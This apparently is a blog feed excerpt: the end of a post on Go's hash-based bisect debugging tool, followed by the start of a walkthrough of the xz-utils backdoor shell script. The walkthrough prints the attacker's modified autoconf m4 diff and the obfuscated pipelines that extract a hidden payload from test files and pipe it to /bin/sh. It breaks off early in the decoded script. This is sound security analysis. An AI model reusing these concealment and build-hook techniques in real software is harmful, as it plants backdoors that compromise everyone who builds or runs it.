<a class=anchor href="#hash-based_bisect-reduce"><h2 id="hash-based_bisect-reduce">Hash-Based Bisect-Reduce</h2></a>
<p>
A different way to keep the location list implicit is to
hash each location to a (random-looking) integer and then
use bit suffixes to identify sets of locations.
The hash computation does not depend on the sequence
in which the source locations are encountered,
making hashing compatible with
parallel compilation, thread interleaving, and so on.
The hashes effectively arrange the functions
into a binary tree:
<p>
<img name="hashbisect1" class="center pad" width=817 height=411 src="hashbisect1.png" srcset="hashbisect1.png 1x, hashbisect1@1.5x.png 1.5x, hashbisect1@2x.png 2x, hashbisect1@3x.png 3x">
<p>
Looking for a single culprit is a basic walk down the tree.
Even better, the general bisect-reduce algorithm is easily
adapted to hash suffix patterns.
First we have to adjust the definition of <code>buggy</code>:
we need it to tell us the number of matches for the
suffix we are considering, so we know whether
we can stop reducing the case:
<pre>// buggy reports whether the bug is triggered
// by enabling the change at the locations with
// hashes ending in suffix or any of the extra suffixes.
// It also returns the number of locations found that
// end in suffix (only suffix, ignoring extra).
func buggy(suffix string, extra []string) (fail bool, n int)
</pre>
<p>
Now we can translate the easy/hard algorithm more or less directly:
<pre>// BisectReduce returns a locally minimal list of hash suffixes,
// each of which uniquely identifies a single location hash,
// such that buggy("none", list) = true.
func BisectReduce() []string {
	if fail, _ := buggy("none", nil); fail {
		return nil
	}
	return bisect("", []string{})
}
// bisect returns a locally minimal list of hash suffixes,
// each of which uniquely identifies a single location hash,
// and all of which end in suffix,
// such that buggy(result+forced) = true.
//
// Precondition: buggy(suffix, forced) = true, _.
// and buggy("none", forced) = false, 0.
//
// Postcondition: buggy("none", result+forced) = true, 0;
// each suffix in result matches a single location hash;
// and buggy("none", x+forced) = false for any x ⊂ result.
// Also, if there are any valid single-element results,
// then bisect returns one of them.
func bisect(suffix string, forced []string) []string {
	if _, n := buggy(suffix, forced); n == 1 {
		// Suffix identifies a single location.
		return []string{suffix}
	}
	// If either of 0suffix or 1suffix is sufficient
	// by itself, focus there.
	if fail, _ := buggy("0"+suffix, forced); fail {
		return bisect("0"+suffix, forced)
	}
	if fail, _ := buggy("1"+suffix, forced); fail {
		return bisect("1"+suffix, forced)
	}
	// Neither half suffices alone, so we need parts of both:
	// reduce the left half while forcing the full right half,
	// then reduce the right half while forcing the reduced left half.
	leftReduced := bisect("0"+suffix,
		slices.Concat([]string{"1" + suffix}, forced))
	rightReduced := bisect("1"+suffix,
		slices.Concat(leftReduced, forced))
	return slices.Concat(leftReduced, rightReduced)
}
</pre>
<p>
Careful readers might note that in the easy cases,
the recursive call to <code>bisect</code> starts by repeating the same
call to <code>buggy</code> that the caller did,
this time to count the number of matches for the suffix in question.
An efficient implementation could pass the result of that run to
the recursive call, avoiding redundant trials.
<p>
In this version, <code>bisect</code> does not guarantee to cut the search space in half
at each level of the recursion.
Instead, the randomness of the hashes means that it cuts the search space
roughly in half on average.
That’s still enough for logarithmic behavior when there are
just a few culprits.
The algorithm would also work correctly if the suffixes were
applied to match a consistent sequential numbering instead of hashes;
the only problem is obtaining the numbering.
<p>
The hash suffixes are about as short as the function number ranges
and easily passed on the command line.
For example, a hypothetical Java compiler could use <code>-XX:CIAllowHash=000,10,111</code>.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Function Selection</h2></a>
<p>
The earliest use of hash-based bisect-reduce in Go was for
selecting functions, as in the example we’ve been considering.
In 2015, Keith Randall was working on a new SSA backend for the Go
compiler. The old and new backends coexisted, and the compiler
could use either for any given function in the program being compiled.
Keith introduced an
<a href="https://go.googlesource.com/go/+/e3869a6b65bb0f95dac7eca3d86055160b12589f">environment variable GOSSAHASH</a>
that specified the last few binary
digits of the hash of function names that should use the new backend:
GOSSAHASH=0110 meant “compile only those functions whose names hash
to a value with last four bits 0110.”
When a test was failing with the new backend,
a person debugging the test case
tried GOSSAHASH=0 and GOSSAHASH=1 and then used binary
search to progressively refine the pattern, narrowing the failure down
until only a single function was being compiled with the new backend.
This was invaluable for approaching failures in large real-world tests
(tests for libraries or production code, not for the compiler) that we
had not written and did not understand.
The approach assumed that the failure could always be reduced to
a single culprit function.
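<p>
In code, the compiler-side check amounts to hashing the function name and comparing the low bits against the pattern in the environment. A sketch, using FNV purely for illustration (the real compiler has its own hash function):
<pre>// useNewBackend reports whether a function should be compiled
// with the new backend, based on whether the low bits of a hash
// of its name match the binary pattern in GOSSAHASH.
// FNV here is only for illustration.
func useNewBackend(funcName string) bool {
	pattern := os.Getenv("GOSSAHASH")
	if pattern == "" {
		return true // no pattern set: use the new backend everywhere
	}
	h := fnv.New32a()
	h.Write([]byte(funcName))
	sum := h.Sum32()
	for i := 0; i < len(pattern); i++ {
		want := uint32(pattern[len(pattern)-1-i] - '0')
		if (sum>>uint(i))&1 != want {
			return false
		}
	}
	return true
}
</pre>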
<p>
It is fascinating that HotSpot, Cinder, and Go all hit upon the idea
of binary search to find miscompiled functions in a compiler,
and yet all three used different selection mechanisms
(counters, function lists, and hashes).
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: SSA Rewrite Selection</h2></a>
<p>
In late 2016, David Chase was debugging a new optimizer rewrite rule that
should have been correct but was causing mysterious test failures.
He <a href="https://go-review.googlesource.com/29273">reused the same technique</a>
but at finer granularity:
the bit pattern now controlled which functions that rewrite rule
could be used in.
<p>
David also wrote the <a href="https://github.com/dr2chase/gossahash/tree/e0bba144af8b1cc8325650ea8fbe3a5c946eb138">initial version of a tool, <code>gossahash</code></a>,
for taking on the job of binary search.
Although <code>gossahash</code> only looked for a single culprit, it was remarkably helpful.
It served for many years and eventually became <code>bisect</code>.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Fused Multiply-Add</h2></a>
<p>
Having a tool available, instead of needing to bisect manually,
made us keep finding problems we could solve.
In 2022, another presented itself.
We had updated the Go compiler to use floating-point fused multiply-add (FMA)
instructions on a new architecture, and some tests were failing.
By making the FMA rewrite conditional on a suffix of a hash that
included the current file name and line number,
we could apply bisect-reduce to identify the specific line in the source code
where an FMA instruction broke the test.
<p>
For example, this bisection finds that <code>b.go:7</code> is the culprit line:
<p>
<img name="hashbisect0" class="center pad" width=254 height=218 src="hashbisect0.png" srcset="hashbisect0.png 1x, hashbisect0@1.5x.png 1.5x, hashbisect0@2x.png 2x, hashbisect0@3x.png 3x, hashbisect0@4x.png 4x">
<p>
FMA is not something most programmers encounter.
If they do get an FMA-induced test failure, having a tool that automatically
identifies the exact culprit line is invaluable.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Language Changes</h2></a>
<p>
The next problem that presented itself was a language change.
Go, like C# and JavaScript, learned the hard way that loop-scoped loop variables
don’t mix well with closures and concurrency.
Like those languages, Go recently changed to <a href="https://go.dev/blog/loopvar-preview">iteration-scoped loop variables</a>,
correcting many buggy programs in the process.
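<p>
For readers who have not run into the problem, here is a minimal sketch of the kind of loop the change affects (not code from any of the actual failures):
<pre>// With loop-scoped variables (Go 1.21 and earlier), every goroutine
// shares the single variable v and typically prints "c" three times.
// With iteration-scoped variables (Go 1.22 and later), each goroutine
// captures its own v, so "a", "b", and "c" are each printed once.
func loopExample() {
	var wg sync.WaitGroup
	for _, v := range []string{"a", "b", "c"} {
		wg.Add(1)
		go func() {
			defer wg.Done()
			fmt.Println(v)
		}()
	}
	wg.Wait()
}
</pre>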
<p>
Unfortunately, sometimes tests unintentionally check for buggy behavior.
Deploying the loop change in a large code base, we confronted truly
mysterious failures in complex, unfamiliar code.
Conditioning the loop change on a suffix of a hash of the source file name and line number
enabled bisect-reduce to pinpoint the specific loop or loops that triggered
the test failures.
We even found a few cases where changing any one loop did not
cause a failure, but changing a specific pair of loops did.
The generality of finding multiple culprits is necessary in practice.
<p>
The loop change would have been far more difficult without
automated diagnosis.
<a class=anchor href="#use_case"><h2 id="use_case">Use Case: Library Changes</h2></a>
<p>
Bisect-reduce also applies to library changes:
we can hash the caller, or more precisely the call stack,
and then choose between the old and new implementation
based on a hash suffix.
<p>
For example, suppose you add a new sort implementation and
a large program fails.
Assuming the sort is correct, the problem is almost certainly that
the new sort and the old sort disagree about the final order of
some values that compare equal.
Or maybe the sort is buggy.
Either way, the large program probably calls sort in many different places.
Running bisect-reduce over hashes of the call stacks
will identify the exact call stack where using the new sort causes a failure.
This is what was happening in the example at the start of the post,
with a new timer implementation instead of a new sort.
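<p>
A sketch of the library-side mechanism, with a hypothetical matcher callback standing in for the hash-suffix check (this is not the real bisect package API):
<pre>// useNewImpl hashes the current call stack and asks the matcher
// whether the new implementation should be used for this call site.
// The match callback is hypothetical; in practice it would check the
// hash against a suffix pattern supplied by the bisect tool.
func useNewImpl(match func(uint64) bool) bool {
	var pcs [16]uintptr
	n := runtime.Callers(2, pcs[:])
	h := fnv.New64a()
	for _, pc := range pcs[:n] {
		var buf [8]byte
		binary.LittleEndian.PutUint64(buf[:], uint64(pc))
		h.Write(buf[:])
	}
	return match(h.Sum64())
}
</pre>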
<p>
Call stacks are a use case that only works with hashing,
not with sequential numbering.
For the examples up to this point, a setup pass could number all
the functions in a program or number all the source lines presented
to the compiler, and then bisect-reduce could apply to binary suffixes
of the sequence number.
But there is no dense sequential numbering of all the possible call stacks
a program will encounter.
On the other hand, hashing a list of program counters is trivial.
<p>
We realized that bisect-reduce would apply to library changes
around the time we were introducing the
<a href="https://go.dev/doc/godebug">GODEBUG mechanism</a>,
which provides a framework for tracking and toggling these kinds of
compatible-but-breaking changes.
We arranged for that framework to provide <code>bisect</code> support for all
GODEBUG settings automatically.
<p>
For Go 1.23, we rewrote the <a href="https://go.dev/pkg/time/#Timer">time.Timer</a>
implementation and changed its semantics slightly,
to remove some races in existing APIs
and also enable earlier garbage collection in some common cases.
One effect of the new implementation is that very short timers trigger more reliably.
Before, a 0ns or 1ns timer (which are often used in tests) could take
many microseconds to trigger.
Now, they trigger on time.
But of course, buggy code (mostly in tests) exists that fails
when the timers start triggering as early as they should.
We debugged a dozen or so of these inside Google’s source tree—all of them complex and unfamiliar—and
<code>bisect</code> made the process painless and maybe even fun.
<p>
For one failing test case, I made a mistake.
The test looked simple enough to eyeball, so I spent
half an hour puzzling through how the only timer in the code under test,
a hard-coded one minute timer,
could possibly be affected by the new implementation.
Eventually I gave up and ran <code>bisect</code>.
The stack trace showed immediately that there was a testing middleware layer that
was rewriting the one-minute timeout
into a 1ns timeout to speed the test.
Tools see what people cannot.
<a class=anchor href="#interesting_lessons_learned"><h2 id="interesting_lessons_learned">Interesting Lessons Learned</h2></a>
<p>
One interesting thing we learned while working on <code>bisect</code> is that it is
important to try to detect flaky tests.
Early in debugging loop change failures,
<code>bisect</code> pointed at a completely correct, trivial loop in a cryptography package.
At first, we were very scared: if <i>that</i> loop was changing behavior,
something would have to be very wrong in the compiler.
We realized the problem was flaky tests. A test that fails randomly
causes <code>bisect</code> to make a random walk over the source code,
eventually pointing a finger at entirely innocent code.
After that, we added a <code>-count=N</code> flag to <code>bisect</code> that causes it
to run every trial <i>N</i> times and bail out entirely if they disagree.
We set the default to <code>-count=2</code> so that <code>bisect</code> always does basic
flakiness checking.
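<p>
For example, the trial count can be raised when invoking <code>bisect</code>, as in:
<pre>% bisect -count=3 -compile=loopvar go test
</pre>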
<p>
Flaky tests remain an area that needs more work. If the problem being debugged
is that a test went from passing reliably to failing half the time,
running <code>go test -count=5</code> increases the chance of failure by running the test five times.
Equivalently, it can help to use a tiny shell script like
<pre>% cat bin/allpass
#!/bin/sh
n=$1
shift
for i in $(seq $n); do
"$@" || exit 1
done
</pre>
<p>
Then <code>bisect</code> can be invoked as:
<pre>% bisect -godebug asynctimerchan=1 allpass 5 ./flakytest
</pre>
<p>
Now bisect only sees <code>./flakytest</code> passing five times in a row as a successful run.
<p>
Similarly, if a test goes from passing unreliably to failing all the time,
an <code>anypass</code> variant works instead:
<pre>% cat bin/anypass
#!/bin/sh
n=$1
shift
for i in $(seq $n); do
"$@" && exit 0
done
exit 1
</pre>
<p>
The <a href="https://man7.org/linux/man-pages/man1/timeout.1.html"><code>timeout</code> command</a>
is also useful if the change has made a test run forever instead of failing.
<p>
The tool-based approach to handling flakiness works decently
but does not seem like a complete solution.
A more principled approach inside <code>bisect</code> would be better.
We are still working out what that would be.
<p>
Another interesting thing we learned is that when bisecting over
run-time changes, hash decisions are made so frequently that
it is too expensive to print the full stack trace of every decision
made at every stage of the bisect-reduce.
(The first run uses an empty suffix that matches every hash!)
Instead, bisect hash patterns default to a “quiet” mode where each
decision prints only the hash bits, since that’s all <code>bisect</code> needs
to guide the search and narrow down the relevant stacks.
Once <code>bisect</code> has identified a minimal set of relevant stacks,
it runs the test once more with the hash pattern in “verbose” mode.
That causes the bisect library to print both the hash bits
and the corresponding stack traces,
and <code>bisect</code> displays those stack traces in its report.
<a class=anchor href="#try_bisect"><h2 id="try_bisect">Try Bisect</h2></a>
<p>
The <a href="https://pkg.go.dev/golang.org/x/tools/cmd/bisect"><code>bisect</code> tool</a>
can be downloaded and used today:
<pre>% go install golang.org/x/tools/cmd/bisect@latest
</pre>
<p>
If you are debugging a <a href="https://go.dev/wiki/LoopvarExperiment">loop variable problem</a> in Go 1.22, you can use
a command like
<pre>% bisect -compile=loopvar go test
</pre>
<p>
If you are debugging a <a href="https://go.dev/change/966609ad9e82ba173bcc8f57f4bfc35a86a62c8a">timer problem in Go 1.23</a>, you can use:
<pre>% bisect -godebug asynctimerchan=1 go test
</pre>
<p>
The <code>-compile</code> and <code>-godebug</code> flags are conveniences.
The general form of the command is
<pre>% bisect [KEY=value...] cmd [args...]
</pre>
<p>
where the leading <code>KEY=value</code> arguments set environment variables
before invoking the command with the remaining arguments.
<code>Bisect</code> expects to find the literal string <code>PATTERN</code> somewhere
on its command line, and it replaces that string with a hash pattern
each time it repeats the command.
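<p>
For example, a hypothetical tool that reads its hash pattern from an environment variable could be driven like this (<code>MYTOOL_HASH</code> and <code>mytool</code> are made-up names):
<pre>% bisect MYTOOL_HASH=PATTERN mytool test.input
</pre>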
<p>
You can use <code>bisect</code> to debug problems in your own compilers or libraries
by having them accept a hash pattern either in the environment or on
the command line and then print specially formatted lines for <code>bisect</code>
on standard output or standard error.
The easiest way to do this is to use
<a href="https://pkg.go.dev/golang.org/x/tools/internal/bisect">the bisect package</a>.
That package is not available for direct import yet
(there is a <a href="https://go.dev/issue/67140">pending proposal</a> to add it to the Go standard library),
but the package is only a <a href="https://cs.opensource.google/go/x/tools/+/master:internal/bisect/bisect.go">single file with no imports</a>,
so it is easily copied into new projects or even translated to other languages.
The package documentation also documents the hash pattern syntax
and required output format.
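<p>
As a rough sketch of the library side, assuming a Matcher API along the lines described in the package documentation (<code>New</code>, <code>Hash</code>, <code>ShouldPrint</code>, <code>ShouldEnable</code>, <code>Marker</code>; check the docs for exact signatures), a change guarded by a hash of file and line might look like:
<pre>// applyChange reports whether the guarded change should be enabled
// at file:line, and prints the specially formatted marker line that
// the bisect tool looks for. This is a sketch based on the package
// documentation, not a verified use of the exact API.
func applyChange(m *bisect.Matcher, file string, line int) bool {
	if m == nil {
		return true // no pattern supplied: always enable
	}
	h := bisect.Hash(file, line)
	if m.ShouldPrint(h) {
		fmt.Fprintf(os.Stderr, "%s %s:%d\n", bisect.Marker(h), file, line)
	}
	return m.ShouldEnable(h)
}
</pre>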
<p>
If you work on compilers or libraries and ever need to debug why
a seemingly correct change you made broke a complex program,
give <code>bisect</code> a try.
It never stops feeling like magic.
The xz attack shell scripttag:research.swtch.com,2012:research.swtch.com/xz-script2024-04-02T04:00:00-04:002024-04-03T11:02:00-04:00A detailed walkthrough of the xz attack shell script.<a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a>
<p>
Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">published the existence of the xz attack</a> on 2024-03-29 to the public oss-security@openwall mailing list. The day before, he alerted Debian security and the (private) distros@openwall list. In his mail, he says that he dug into this after “observing a few odd symptoms around liblzma (part of the xz package) on Debian sid installations over the last weeks (logins with ssh taking a lot of CPU, valgrind errors).”
<p>
At a high level, the attack is split in two pieces: a shell script and an object file. There is an injection of shell code during <code>configure</code>, which injects the shell code into <code>make</code>. The shell code during <code>make</code> adds the object file to the build. This post examines the shell script. (See also <a href="xz-timeline">my timeline post</a>.)
<p>
The nefarious object file would have looked suspicious checked into the repository as <code>evil.o</code>, so instead both the nefarious shell code and object file are embedded, compressed and encrypted, in some binary files that were added as “test inputs” for some new tests. The test file directory already existed from long before Jia Tan arrived, and the README explained “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” This is a fact of life for parsing libraries like liblzma. The attacker looked like they were just <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">adding a few new test files</a>.
<p>
Unfortunately the nefarious object file turned out to have a bug that caused problems with Valgrind, so the test files needed to be updated to add the fix. <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">That commit</a> explained “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.” The attackers realized at this point that they needed a better update mechanism, so the new nefarious script contains an extension mechanism that lets it look for updated scripts in new test files, which wouldn’t draw as much attention as rewriting existing ones.
<p>
The effect of the scripts is to arrange for the nefarious object file’s <code>_get_cpuid</code> function to be called as part of a <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC">GNU indirect function</a> (ifunc) resolver. In general these resolvers can be called lazily at any time during program execution, but for security reasons it has become popular to call all of them during dynamic linking (very early in program startup) and then map the <a href="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html">global offset table (GOT) and procedure linkage table (PLT) read-only</a>, to keep buffer overflows and the like from being able to edit it. But a nefarious ifunc resolver would run early enough to be able to edit those tables, and that’s exactly what the backdoor introduced. The resolver then looked through the tables for <code>RSA_public_decrypt</code> and replaced it with a nefarious version that <a href="https://github.com/amlweems/xzbot">runs attacker code when the right SSH certificate is presented</a>.
<a class=anchor href="#configure"><h2 id="configure">Configure</h2></a>
<p>
Again, this post looks at the script side of the attack. Like most complex Unix software, xz-utils uses GNU autoconf to decide how to build itself on a particular system. In ordinary operation, autoconf reads a <code>configure.ac</code> file and produces a <code>configure</code> script, perhaps with supporting m4 files brought in to provide “libraries” to the script. Usually, the <code>configure</code> script and its support libraries are only added to the tarball distributions, not the source repository. The xz distribution works this way too.
<p>
The attack kicks off with the attacker adding an unexpected support library, <code>m4/build-to-host.m4</code> to the xz-5.6.0 and xz-5.6.1 tarball distributions. Compared to the standard <code>build-to-host.m4</code>, the attacker has made the following changes:
<pre>diff --git a/build-to-host.m4 b/build-to-host.m4
index ad22a0a..d5ec315 100644
--- a/build-to-host.m4
+++ b/build-to-host.m4
@@ -1,5 +1,5 @@
-# build-to-host.m4 serial 3
-dnl Copyright (C) 2023 Free Software Foundation, Inc.
+# build-to-host.m4 serial 30
+dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
dnl with or without modifications, as long as this notice is preserved.
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
dnl Define somedir_c.
gl_final_[$1]="$[$1]"
+ gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
dnl Translate it from build syntax to host syntax.
case "$build_os" in
cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
[$1]_c_make='\"$([$1])\"'
fi
+ if test "x$gl_am_configmake" != "x"; then
+ gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+ else
+ gl_[$1]_config=''
+ fi
+ _LT_TAGDECL([], [gl_path_map], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+ _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+ _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
AC_SUBST([$1_c_make])
+
+ dnl If the host conversion code has been placed in $gl_config_gt,
+ dnl instead of duplicating it all over again into config.status,
+ dnl then we will have config.status run $gl_config_gt later, so it
+ dnl needs to know what name is stored there:
+ AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
])
dnl Some initializations for gl_BUILD_TO_HOST.
AC_DEFUN([gl_BUILD_TO_HOST_INIT],
[
+ dnl Search for Automake-defined pkg* macros, in the order
+ dnl listed in the Automake 1.10a+ documentation.
+ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+ if test -n "$gl_am_configmake"; then
+ HAVE_PKG_CONFIGMAKE=1
+ else
+ HAVE_PKG_CONFIGMAKE=0
+ fi
+
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
+ gl_path_map='tr "\t \-_" " \t_\-"'
changequote(,)dnl
gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
changequote([,])dnl
</pre>
<p>
All in all, this is a fairly plausible set of diffs, in case anyone thought to check. It bumps the version number, updates the copyright year to look current, and makes a handful of inscrutable changes that don’t look terribly out of place.
<p>
Looking closer, something is amiss. Starting near the bottom,
<pre>gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
if test -n "$gl_am_configmake"; then
HAVE_PKG_CONFIGMAKE=1
else
HAVE_PKG_CONFIGMAKE=0
fi
</pre>
<p>
Let’s see which files in the distribution match the pattern (simplifying the <code>grep</code> command):
<pre>% egrep -Rn '####[[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]]####$'
Binary file ./tests/files/bad-3-corrupt_lzma2.xz matches
%
</pre>
<p>
That’s surprising! So this script sets <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code> and <code>HAVE_PKG_CONFIGMAKE=1</code>. The <code>gl_path_map</code> setting is a <a href="https://linux.die.net/man/1/tr">tr(1)</a> command that swaps tabs and spaces and swaps underscores and dashes.
<p>
Now reading the top of the script,
<pre>gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
</pre>
<p>
extracts the final dot-separated element of that filename, leaving <code>xz</code>. That is, it’s the file name suffix, not a prefix, and it is the name of the compression command that is likely already installed on any build machine.
<p>
The next section is:
<pre>if test "x$gl_am_configmake" != "x"; then
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
else
gl_[$1]_config=''
fi
</pre>
<p>
We know that <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code>, so this sets the <code>gl_[$1]_config</code> variable to the string
<pre>sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null
</pre>
<p>
At first glance, especially in the original quoted form, the <code>sed</code> command looks like it has something to do with line endings, but in fact <code>r\n</code> is the <code>sed</code> “read from file <code>\n</code>” command. Since the file <code>\n</code> does not exist, the command does nothing at all, and then since <code>sed</code> has not been invoked with the <code>-n</code> option, <code>sed</code> prints each line of input. So <code>sed "r\n"</code> is just an obfuscated <code>cat</code> command, and remember that <code>$gl_path_map</code> is the <code>tr</code> command from before, and <code>$gl_[$1]_prefix</code> is <code>xz</code>. To the shell, this command is really
<pre>cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d
</pre>
<p>
But right now it’s still just a string; it hasn’t been run. That changes with
<pre>dnl If the host conversion code has been placed in $gl_config_gt,
dnl instead of duplicating it all over again into config.status,
dnl then we will have config.status run $gl_config_gt later, so it
dnl needs to know what name is stored there:
AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
</pre>
<p>
The final <code>"eval \$gl_[$1]_config"</code> runs that command. If we run it on the xz 5.6.0 repo, we get:
<pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d
####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +724)";
(xz -dc $srcdir/tests/files/good-large_compressed.lzma|
eval $i|tail -c +31265|
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|
xz -F raw --lzma1 -dc|/bin/sh
####World####
$
</pre>
<p>
I have inserted some line breaks, here and in later script fragments,
to keep the lines from being too long in the web page.
<p>
Why the Hello and World? The README text that came with the test file describes it:<blockquote>
<p>
bad-3-corrupt_lzma2.xz has three Streams in it. The first and third streams are valid xz Streams. The middle Stream has a correct Stream Header, Block Header, Index and Stream Footer. Only the LZMA2 data is corrupt. This file should decompress if <code>--single-stream</code> is used.</blockquote>
<p>
The first and third streams are the Hello and World, and the middle stream has been corrupted by swapping the byte values unswapped by the <code>tr</code> command.
<p>
Recalling that xz 5.6.1 shipped with different “test” files, we can also try xz 5.6.1:
<pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d
####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +939)";
(xz -dc $srcdir/tests/files/good-large_compressed.lzma|
eval $i|tail -c +31233|
tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|
xz -F raw --lzma1 -dc|/bin/sh
####World####
$
</pre>
<p>
The first difference is that the script makes sure (very sure!) to exit if not being run on Linux. The second difference is that the long “<code>export i</code>” line deviates in the final head command offset (724 vs 939) and then the tail offset and the <code>tr</code> argument. Let’s break those down.
<p>
The <code>head</code> command prints a prefix of its input. Let’s look at the start:
<pre>(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 && ...
</pre>
<p>
This discards the first kilobyte of standard input, prints the next two kilobytes, discards the next kilobyte, and prints the next two kilobytes. And so on. The whole command for 5.6.1 is:
<pre>(head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 &&
... 16 times total ...
head -c +939
</pre>
<p>
The shell variable <code>i</code> is set to this long command. Then the script runs:
<pre>xz -dc $srcdir/tests/files/good-large_compressed.lzma |
eval $i |
tail -c +31233 |
tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" |
xz -F raw --lzma1 -dc |
/bin/sh
</pre>
<p>
The first <code>xz</code> command uncompresses another malicious test file. The <code>eval</code> then runs the <code>head</code> pipeline, extracting a total of 16×2048+939 = 33,707 bytes. Then the <code>tail</code> command discards the first 31,232 bytes, keeping only the final 2,475 bytes. The <code>tr</code> command applies a simple substitution cipher to the output (so that just in case anyone thought to pull these specific byte ranges out of the file, they wouldn’t recognize it as a valid lzma input!?). The second <code>xz</code> command decodes the translated bytes as a raw lzma stream, and then of course the result is piped through the shell.
<p>
Skipping the shell pipe, we can run this, obtaining a very long shell script. I have added commentary in between sections of the output.
<pre>$ xz -dc $srcdir/tests/files/good-large_compressed.lzma |
eval $i |
tail -c +31233 |
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" |
xz -F raw --lzma1 -dc
P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
